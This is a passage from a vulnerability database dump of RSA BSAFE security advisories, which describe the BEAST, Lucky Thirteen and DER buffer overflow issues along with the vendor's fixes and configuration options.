selection.\r\n\r\n\r\nEMC Product Security Response Center\r\n\r\nSecurity_Alert@EMC.COM\r\n\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (Cygwin)\r\n\r\niEYEARECAAYFAlBKOMwACgkQtjd2rKp+ALw1HQCfezG65rzhhtvVQAFkXzXQmthr\r\nCc8An3CJlTmuxBfF1dHt/NvQgKED9eR4\r\n=++hy\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "securityvulns", "title": "ESA-2012-032: RSA BSAFE(r) Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2012-10-29T00:00:00", "id": "SECURITYVULNS:DOC:28707", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28707", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n\r\n\r\nESA-2013-039.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2013-039: RSA BSAFE\u00ae SSL-J Multiple Vulnerabilities\r\n\r\n\r\nEMC Identifier: ESA-2013-039\r\n\r\n \r\n\r\nCVE Identifier: CVE-2011-3389, CVE-2013-0169\r\n\r\n \r\n\r\nSeverity Rating: CVSS v2 Base Score: Refer NVD (http://nvd.nist.gov/) for individual scores for each CVE\r\n\r\n \r\n\r\nAffected Products:\r\n\r\nFor the BEAST vulnerability, all versions of RSA BSAFE SSL-J except for 6.1.2 and 5.1.4 are affected.\r\n\r\nFor the Lucky Thirteen vulnerability, all versions of RSA BSAFE SSL-J except for 6.0.1, 6.1.2, 5.1.2, 5.1.3 and 5.1.4 are affected.\r\n\r\n \r\n\r\nUnaffected Products:\r\n\r\nRSA BSAFE SSL-J 6.1.2 and 5.1.4 (newly released)\r\n\r\n \r\n\r\nSummary: \r\n\r\nRSA BSAFE SSL-J 6.1.2 and 5.1.4 contain updates designed to help prevent the BEAST vulnerability (CVE-2011-3389). RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to help prevent the SSL/TLS Plaintext Recovery (aka Lucky Thirteen) vulnerability (CVE-2013-0169).\r\n\r\n \r\n\r\nDetails: \r\n\r\nBEAST\r\n\r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n\r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n\r\n \r\n\r\nLucky Thirteen\r\n\r\nResearchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The \u201cLucky Thirteen\u201d attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.\r\n\r\n \r\n\r\nDetails of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf\r\n\r\n \r\n\r\nRecommendation:\r\n\r\n \r\n\r\nFor the BEAST vulnerability:\r\n\r\nThe best way to help prevent the BEAST attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n\r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n\r\n \r\n\r\nFirst block splitting for SSLv3 or TLS v1.0 communications, as a prevention against the BEAST exploit, introduced in SSL-J 6.0.1 and SSL-J 5.1.2 is not working.\r\n\r\n \r\n\r\nIn SSL-J 6.1.2 and 5.1.4, the way to prevent the BEAST exploit is to introduce some unknown data into the encryption scheme, prior to the attackers inserted plain text data. This is done as follows:\r\n\r\n \r\n\r\n1. The first plaintext write will result in one or more encrypted records as usual.\r\n\r\n2. The second and subsequent writes are \u201csplit\u201d. That is, each write will generate two or more records such that the first encrypted record contains only one byte of plaintext.\r\n\r\n3. A MAC is generated from the one byte of data and the MAC key. This MAC is appended to the plaintext for the record to be encrypted prior to being encrypted.\r\n\r\n \r\n\r\nThe splitting of the encrypted records generated by the second and subsequent writes ensures that the attacker never sees a cipher text block that immediately precedes a cipher text block generated from their chosen plaintext. This ensures that it is impossible for an attacker to predict the IV that will be used to encrypt their chosen plain text and hence the attack cannot be executed.\r\n\r\n \r\n\r\nNote the following about first block splitting:\r\n\r\n - Splitting only occurs:\r\n\r\n o For negotiated cipher suites that use CBC mode.\r\n\r\n o For protocols SSLv3 or TLS v1.0.\r\n\r\n - Only application data packets are spilt. Handshake packets are not split,\r\n\r\n - Blocks of plaintext are split for each subsequent call to write data to the SSL connection after the first write is sent.\r\n\r\n \r\n\r\nFor RSA BSAFE SSL-J 6.1.2 and 5.1.4, record splitting is engineered to be enabled by default for vulnerable cipher suites, making the application secure by default. If required, the application can disable record splitting by setting the system property jsse.enableCBCProtection:\r\n\r\n \r\n\r\n\u2022 Using the following Java code:\r\n\r\n System.setProperty("jsse.enableCBCProtection", "false");\r\n\r\n \r\n\r\n OR\r\n\r\n \r\n\r\n\u2022 On the Java command line, passing the following argument:\r\n\r\n -Djsse.enableCBCProtection=\u201dfalse\u201d\r\n\r\n \r\n\r\nFor more information about setting security properties, see section System and Security Properties in the RSA BSAFE SSL-J Developer Guide.\r\n\r\n \r\n\r\n \r\n\r\nFor the Lucky Thirteen vulnerability:\r\n\r\nRSA BSAFE SSL-J 6.0.1 and 5.1.2 contain a patch that is designed to help ensure that MAC checking is time invariant in servers. Customers can also protect against the Lucky Thirteen attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.\r\n\r\n \r\n\r\n \r\n\r\nRSA recommends that customers on RSA BSAFE SSL-J 5.1.x (or lower) and 6.x upgrade to RSA BSAFE SSL-J 5.1.4 and 6.1.2 respectively to resolve both the BEAST and the Lucky Thirteen vulnerabilities.\r\n\r\n \r\n\r\nObtaining Downloads: \r\n\r\nTo request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service. \r\n\r\nObtaining Documentation:\r\n\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\nSeverity Rating:\r\n\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nObtaining More Information:\r\n\r\nFor more information about RSA products, visit the RSA web site at http://www.rsa.com.\r\n\r\nGetting Support and Service:\r\n\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\nGeneral Customer Support Information:\r\n\r\nhttp://www.emc.com/support/rsa/index.htm\r\n\r\nRSA SecurCare Online:\r\n\r\nhttps://knowledge.rsasecurity.com\r\n\r\nEOPS Policy:\r\n\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.\r\nhttp://www.emc.com/support/rsa/eops/index.htm\r\n\r\nSecurCare Online Security Advisories\r\n\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\n\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\nSincerely,\r\n\r\nRSA Customer Support\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlM9gG8ACgkQtjd2rKp+ALxfXACfcBq3ox0rrD8Xtn+ReCya0oB9\r\nhuMAn36FiacTbJug8gvKyI+9IA9tVQFR\r\n=I/i+\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2014-04-07T00:00:00", "type": "securityvulns", "title": "ESA-2013-039: RSA BSAFE\u00ae SSL-J Multiple Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-0169", "CVE-2011-3389"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:DOC:30449", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30449", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\n\r\n\r\nESA-2013-039.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2013-039: RSA BSAFE\u00ae SSL-J Multiple Vulnerabilities\r\n\r\n\r\nEMC Identifier: ESA-2013-039\r\n\r\n\r\nCVE Identifier: CVE-2011-3389, CVE-2013-0169\r\n\r\n\r\nSeverity Rating: CVSS v2 Base Score: Refer NVD (http://nvd.nist.gov/) for individual scores for each CVE\r\n\r\n \r\n\r\nAffected Products:\r\n\r\nAll versions of RSA BSAFE SSL-J except for 6.0.1 and 5.1.2\r\n\r\n \r\n\r\nUnaffected Products:\r\n\r\nRSA BSAFE SSL-J 6.0.1 and 5.1.2 (newly released)\r\n\r\n \r\n\r\nSummary: \r\n\r\nRSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks (CVE-2011-3389) and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).\r\n\r\n \r\n\r\nDetails: \r\n\r\nBEAST\r\n\r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n\r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n\r\n\r\nLucky Thirteen\r\n\r\nResearchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The \u201cLucky Thirteen\u201d attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.\r\n\r\n \r\n\r\nDetails of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf\r\n \r\n\r\n\r\nRecommendation:\r\n\r\n \r\n\r\nRSA recommends that customers on RSA BSAFE SSL-J 5.1.x or lower upgrade to RSA BSAFE SSL-J 5.1.2. RSA recommends that customers on RSA BSAFE SSL-J 6.0 upgrade to RSA BSAFE SSL-J 6.0.1. \r\n\r\nTo address BEAST, RSA introduce a new feature called first block splitting to RSA BSAFE SSL-J 6.0.1 and 5.1.2. First block splitting is designed to prevent the BEAST exploit by introducing unknown data into the encryption scheme prior to the attackers inserted plain text data. This is done as follows: \r\n\r\n\u20221. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.\r\n\u20222. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.\r\n\u20223. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\nFor RSA BSAFE SSL-J 6.0.1 and 5.1.2, first block splitting is engineered to be enabled by default for vulnerable cipher suites, making the application secure by default. If required, the application can disable first block splitting by setting the system property jsse.enableCBCProtection:\r\n\r\n \r\n\r\n\u2022 Using the following Java code:\r\n\r\n System.setProperty("jsse.enableCBCProtection", "false");\r\n\r\n \r\n\r\n OR\r\n\r\n \r\n\r\n\u2022 On the Java command line, passing the following argument:\r\n\r\n -Djsse.enableCBCProtection=\u201dfalse\u201d\r\n\r\n \r\n\r\nFor more information about setting security properties, see section System and Security Properties in the RSA BSAFE SSL-J Developer Guide.\r\n\r\nThe best way to help prevent the BEAST attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n\r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n\r\nTo address Lucky Thirteen, RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain a patch that is designed to help ensure that MAC checking is time invariant in servers. \r\n\r\nCustomers can also protect against the Lucky Thirteen attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.\r\n\r\n\r\n\r\nObtaining Downloads:\r\n\r\nTo request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp .\r\n\r\n\r\n\r\nObtaining Documentation:\r\n\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\n\r\n\r\nSeverity Rating:\r\n\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\n\r\n\r\nObtaining More Information:\r\n\r\nFor more information about RSA products, visit the RSA web site at http://www.rsa.com.\r\n\r\n\r\n\r\nGetting Support and Service:\r\n\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\n\r\n\r\nGeneral Customer Support Information:\r\n\r\nhttp://www.rsa.com/node.aspx?id=1264\r\n\r\n\r\n\r\nRSA SecurCare Online:\r\n\r\nhttps://knowledge.rsasecurity.com\r\n\r\n\r\n\r\nEOPS Policy:\r\n\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.rsa.com/node.aspx?id=2575 \r\n\r\n\r\n\r\nSecurCare Online Security Advisories\r\n\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\n\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\n\r\n\r\nSincerely,\r\n\r\nRSA Customer Support\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlHBwyMACgkQtjd2rKp+ALwI0gCbBNOxiDjCZzTl293lMa53Yy2r\r\npcsAn2UpV1x8Zg4031kyOrW5LfV2vner\r\n=W+qW\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2013-07-15T00:00:00", "type": "securityvulns", "title": "ESA-2013-039: RSA BSAFE\u00ae SSL-J Multiple Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-0169", "CVE-2011-3389"], "modified": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29602", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29602", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:10:46", "description": "SSL-related attacks.", "cvss3": {}, "published": "2013-07-15T00:00:00", "type": "securityvulns", "title": "EMC RSA BSAFE multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-0169", "CVE-2011-3389"], "modified": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13186", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13186", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:10:46", "description": "Few SSL related vulnerabilities in certificates chain validation and BEAST attacks.", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "securityvulns", "title": "EMC RSA BSAFE Micro Edition Suite security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2014-0636"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13730", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13730", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n\r\n\r\nESA-2012-029.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nESA-2012-029: RSA BSAFE\u00ae SSL-C Multiple Vulnerabilities \r\n\r\n\r\nEMC Identifier: ESA-2012-029\r\n\r\n\r\nCVE Identifier: CVE-2011-3389, CVE-2012-2110, CVE-2012-2131 \r\n\r\n\r\nSeverity Rating: See below for scores for individual issues \r\n\r\n\r\nAffected Products:\r\n\r\nAll versions of RSA BSAFE SSL-C prior to 2.8.6, all platforms\r\n\r\n\r\nUnaffected Products:\r\n\r\nRSA BSAFE SSL-C 2.8.6\r\n\r\n\r\nSummary:\r\n\r\n\r\nRSA BSAFE SSL-C 2.8.6 contains fixes designed to [prevent] BEAST attacks (CVE-2011-3389) and buffer overflow vulnerability (CVE-2012-2110/CVE-2012-2131).\r\n\r\n\r\n\r\n\r\nDetails:\r\n\r\nThis release includes fixes for the following vulnerabilities:\r\n\r\n1.BEAST (Browser Exploit Against SSL/TLS) attack (CVE-2011-3389\r\n> There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n2.Buffer overflow vulnerability (CVE-2012-2110/CVE-2012-2131)\r\nSSL-C contains code that does not properly interpret integer data, which could allow buffer overflow attacks using crafted DER (Distinguished Encoding Rules) data, such as in X.509 certificate or an RSA asymmetric key.\r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n\r\nRecommendation:\r\n\r\nFor BEAST (Browser Exploit Against SSL/TLS) attack:\r\nThe best way to help prevent this attack is to use TLS v1.1. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 are engineered to be secure against the BEAST exploit. However, support for this higher level protocol is limited to a smaller number of applications, so supporting only TLS v1.1 might cause interoperability issues.\r\n\r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated.\r\n\r\nIn RSA BSAFE SSL-C 2.8.6, the BEAST exploit is prevented by introducing some unknown data into the encryption scheme, prior to the attackers inserted plain text data. This is done as follows: \r\n\r\n1.The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.\r\n2.A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.\r\n3.The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\nTo manage this first block splitting in RSA BSAFE SSL-C 2.8.6, either for an SSL context or SSL object, call R_SSL_CTX_set_options() or R_SSL_set_options() respectively, with the SSL_OP_SPLIT_FIRST_FRAGMENT identifier, this option is enabled by default.\r\n\r\nFor more information about these functions and identifiers, see the RSA BSAFE SSL-C 2.8.6 API Reference Guide.\r\n\r\nFor Buffer Overflow vulnerability:\r\nRSA strongly recommends that RSA BSAFE SSL-C customers upgrade to RSA BSAFE SSL-C 2.8.6 that contains upgrades designed to resolve this issue. \r\n\r\n\r\nSeverity Rating:\r\n\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\n\r\nObtaining Documentation:\r\n\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\n\r\n\r\nObtaining More Information:\r\n\r\nFor more information about RSA BSAFE, visit the RSA web site at http://www.rsa.com/node.aspx?id=1204.\r\n\r\n\r\n\r\nGetting Support and Service:\r\n\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\n\r\nGeneral Customer Support Information:\r\n\r\nhttp://www.rsa.com/node.aspx?id=1264\r\n\r\n\r\nRSA SecurCare Online:\r\n\r\nhttps://knowledge.rsasecurity.com\r\n\r\n\r\nEOPS Policy:\r\n\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.rsa.com/node.aspx?id=2575\r\n\r\n\r\nSecurCare Online Security Advisories\r\n\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\n\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\n\r\nEMC Product Security Response Center\r\n\r\nSecurity_Alert@EMC.COM\r\n\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (Cygwin)\r\n\r\niEYEARECAAYFAlBPWgkACgkQtjd2rKp+ALyqrACgjmN0jwbEEJmgFzr2PScVwaEa\r\nDD0An060pQvghGzvHJMjDJYA0QdnMsXk\r\n=wrOj\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "securityvulns", "title": "ESA-2012-029: RSA BSAFE(r) SSL-C Multiple Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2011-3389", "CVE-2012-2110"], "modified": "2012-10-29T00:00:00", "id": "SECURITYVULNS:DOC:28706", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28706", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:49:20", "description": "BEAST attacks, buffer overflows.", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "securityvulns", "title": "RSA BSAFE security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2011-3389", "CVE-2012-2110"], "modified": "2012-10-29T00:00:00", "id": "SECURITYVULNS:VULN:12679", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12679", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n\r\n\r\nESA-2012-029.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2012-029: RSA BSAFE\u00ae SSL-C Multiple Vulnerabilities\r\n\r\nEMC Identifier: ESA-2012-029\r\n \r\nCVE Identifier: CVE-2011-3389, CVE-2012-2110, CVE-2012-2131\r\n \r\nSeverity Rating: See below for scores for individual issues\r\n \r\nAffected Products:\r\nFor the BEAST vulnerability, all versions of RSA BSAFE SSL-C prior to 2.8.9 are affected.\r\nFor the Buffer Overflow vulnerability, all versions of RSA BSAFE SSL-C prior to 2.8.6 are affected.\r\n \r\nUnaffected Products:\r\nRSA BSAFE SSL-C 2.8.9\r\n \r\nSummary:\r\nRSA BSAFE SSL-C 2.8.6 contains updates designed to help prevent Buffer Overflow vulnerability (CVE-2012-2110/CVE-2012-2131). RSA BSAFE SSL-C 2.8.9 contains updates designed to help prevent the BEAST vulnerability (CVE-2011-3389).\r\n \r\nDetails:\r\n1. BEAST (Browser Exploit Against SSL/TLS) vulnerability (CVE-2011-3389)\r\nThere is a known vulnerability in 